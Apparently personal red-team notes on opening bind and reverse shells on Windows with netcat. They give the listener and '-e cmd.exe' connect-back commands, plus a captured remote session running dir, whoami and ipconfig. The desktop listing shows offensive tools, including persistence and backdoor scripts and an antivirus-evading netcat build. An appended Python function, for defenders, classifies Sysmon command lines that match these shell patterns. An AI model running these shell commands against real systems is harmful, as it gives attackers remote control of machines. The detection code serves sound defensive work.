Bind (forward) shell:

On machine A (132) ==> this is the C2 client:

nc.exe -L -d -e cmd.exe -p 5555

 

On machine B (134):

nc64.exe XXX.132 5555

  

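Then you can type commands to remotely control machine 132!

My nc binaries are all on the desktop, so just open cmd on the desktop!

Reverse shell example:

On host A (134), run the following command to listen on port 8888: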

C:\Users\qiankun\Desktop>nc -n -lvvp 8888
listening on [any] 8888 ...
connect to [XXX] from (UNKNOWN) [XXX] 53960
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.

C:\Users\qiankun\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C6C4-46F7

 Directory of C:\Users\qiankun\Desktop

08/01/2022  01:23 AM    <DIR>          .
08/01/2022  01:23 AM    <DIR>          ..
05/11/2022  01:09 AM    <DIR>          619f00628d0db414e782dbf0f3739eb6ceffd0036c6c83a17c31e3c2f6bdc266
05/11/2022  08:35 PM    <DIR>          80ffaea12a5ffb502d6ce110e251024e7ac517025bf95daa49e6ea6ddd0c7d5b
05/16/2022  12:38 AM    <DIR>          aaabitsadmin.exe.ps1
05/16/2022  12:30 AM               616 aaabitsadmin.exe.ps1.zip
05/24/2022  12:13 AM                 0 Add-ConstrainedDelegationBackdoor.ps1
05/30/2022  10:32 PM       104,857,751 Agent.log
05/23/2022  02:38 AM                 3 agent.ps1
06/13/2022  02:14 AM         8,447,018 Agent_1.log
06/09/2022  11:48 PM    <DIR>          b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl
06/09/2022  11:37 PM         1,324,365 b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl.zip
04/26/2022  07:55 PM               208 bitsadmin.exe.ps1
08/04/2017  02:19 AM            75,418 COM Object hijacking persistence.ps1
04/21/2022  02:30 AM    <DIR>          dev
04/14/2022  11:22 PM               167 exit.bat
03/24/2022  08:41 AM             2,348 Microsoft Edge.lnk
04/19/2022  12:30 AM            24,896 msxsl.exe
07/31/2022  09:00 PM            38,616 nc.exe
07/31/2022  09:00 PM            45,272 nc64.exe
08/01/2022  01:14 AM         5,980,919 nc_miansha.exe
04/13/2022  11:23 PM         1,436,160 NeverLose.bin.exe
05/23/2022  02:37 AM                 0 New Text Document.txt
05/23/2022  02:49 AM    <DIR>          nishang-master
05/23/2022  02:39 AM            80,249 nishang-master.zip
06/10/2022  12:42 AM    <DIR>          Office Tool
06/09/2022  11:54 PM     2,085,551,571 Office Tool.zip
05/18/2022  02:43 AM    <DIR>          phpStudy_64
05/17/2022  07:55 PM        81,485,042 phpStudy_64.zip
07/31/2022  10:04 PM    <DIR>          PSTools
07/31/2022  09:10 PM         4,089,627 PSTools.zip
05/23/2022  11:39 PM    <DIR>          QianKunEDR-Windows-x64-Setup
07/31/2022  07:11 PM    <DIR>          QianKunEDR-Windows-x64-Setup (5)
07/31/2022  06:51 PM        90,915,906 QianKunEDR-Windows-x64-Setup (5).zip
05/23/2022  11:28 PM       108,074,453 QianKunEDR-Windows-x64-Setup.zip
04/14/2022  11:22 PM                65 start.bat
05/06/2022  02:25 AM    <DIR>          Sysmon
05/06/2022  02:14 AM         3,263,064 Sysmon.zip
05/16/2022  02:44 AM    <DIR>          test
05/24/2022  02:10 AM            10,522 test.chm
07/31/2022  06:46 PM         3,607,096 winrarx64.610scp.exe
05/07/2022  12:53 AM    <DIR>          x64
04/14/2022  02:30 AM             1,892 XXX.sct
              27 File(s)  2,499,313,244 bytes
              16 Dir(s)  17,187,168,256 bytes free

C:\Users\qiankun\Desktop>whoami
whoami
desktop-gem2odd\qiankun

C:\Users\qiankun\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : XXX
   IPv4 Address. . . . . . . . . . . : XXXX
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : XXX

  

On machine B (132), run the following command to actively connect to machine A:

nc XXX.134IP 8888 -t -e cmd.exe

 

Then machine B can be controlled from machine A (134).
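
Added example (not part of the original notes): a defender-side check that classifies process command lines, such as the CommandLine field of Sysmon Event ID 1 process-creation events, as the bind or reverse shell pattern shown above. It keys on the netcat-style arguments rather than the image name; the function name, the shell list and the sample lines are constructed for illustration, and the 192.0.2.x addresses are placeholders.

```python
import shlex

SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh.exe"}
ARG_OPTS = set("egGiopsw")   # netcat short options that consume a value
# Constructed sample command lines modelled on the four commands above.
SAMPLES = [
    "nc.exe -L -d -e cmd.exe -p 5555",      # serves cmd.exe on a listening port
    "nc64.exe 192.0.2.132 5555",            # plain client, no -e
    "nc -n -lvvp 8888",                     # plain listener, no -e
    "nc 192.0.2.134 8888 -t -e cmd.exe",    # connects out and hands over cmd.exe
]


def classify(cmdline):
    """Return 'bind', 'reverse' or None for one process command line."""
    try:
        args = shlex.split(cmdline, posix=False)[1:]   # drop the image name
    except ValueError:                                  # unbalanced quotes
        return None
    listening, program, positional = False, None, []
    i = 0
    while i < len(args):
        tok, i = args[i], i + 1
        if not tok.startswith("-") or tok == "-":
            positional.append(tok)                      # host / port operands
            continue
        for pos, ch in enumerate(tok[1:], start=1):     # handles -lvvp style
            if ch in "lL":
                listening = True
            elif ch in ARG_OPTS:
                value = tok[pos + 1:]                   # "-p5555" form
                if not value and i < len(args):
                    value, i = args[i], i + 1           # "-p 5555" form
                if ch == "e":
                    program = value
                break                                   # rest was the value
    name = (program or "").strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name not in SHELLS:
        return None                                     # no shell handed to a socket
    if listening:
        return "bind"
    return "reverse" if len(positional) >= 2 else None


if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{classify(line) or '-':8} {line}")
```

Only the two commands that attach cmd.exe to the socket are flagged; the operator-side listener and client are left unclassified because they carry no -e.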